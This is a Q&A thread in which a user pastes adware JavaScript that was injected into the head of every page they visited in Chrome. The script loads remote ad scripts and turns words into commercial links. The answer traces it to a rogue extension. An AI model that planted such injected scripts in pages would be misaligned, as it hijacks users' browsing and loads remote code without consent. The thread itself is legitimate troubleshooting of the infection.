# An adware javascript always being added in the code everytime i load a site in chrome

Tags: javascript, jquery, html, google-chrome, virus

this script always appear in the inspect element of every site that i go(it includes itself in the html header):

```
    <script type="text/javascript" charset="UTF-8" src="//ads.appsaddons.com/usourcpa.js"></script><script type="text/javascript" charset="UTF-8">(function(){window._prosperent={campaign_id:"eeabc0bb43389b45ba63661d300c7f31",platform:"other"};var a=document,b=a.createElement("script");b.src="http://prosperent.com/js/prosperent.js";(a.body||a.head||a.getElementsByTagName("head")[0]).appendChild(b)})();</script><script type="text/javascript" charset="UTF-8" src="http://i.mactelabsjs.info/mact/javascript.js?channel=mmp1_ntw&amp;apptitle=appsaddons.com"></script><script type="text/javascript" charset="UTF-8">var appendScript = document.createElement("script");
appendScript.type = "text/javascript";
appendScript.charset = 'UTF-8';
if(location.protocol == "http:")
{
    appendScript.src = "http://i.mactelabsjs.info/mact/javascript.js";
}
else if(location.protocol == "https:")
{
    appendScript.src = "https://i_mactelabsjs_info.tlscdn.com/mact/javascript.js";
}
if(appendScript.src)
{
    appendScript.src = appendScript.src + "?channel=mmp1_ntw&apptitle=appsaddons.com";
    documentHead = document.getElementsByTagName("head")[0];
    if (documentHead) 
    {
        documentHead.insertBefore(appendScript, documentHead.firstChild);
    }
}
</script>
```

it makes some(few) of the words in every webpage a hyperlink which leads to a commercial webpage,
i checked my extensions and i found nothing.

Answer (score 2, accepted):

Have you tried disabling all of your extensions?

Another thing you could do is removing all your extensions, uninstall Google Chrome and do a fresh install. Check if the malicious Javascript is still getting loaded. If so, we can rule out the cause by extensions. If not, you can add back your extensions 1 by 1 and check if the problem still occurs.

Comment: okay, that did the trick... i disabled all the extensions and enabled it one by one and '2048 pop up' stand out , thanks for the tip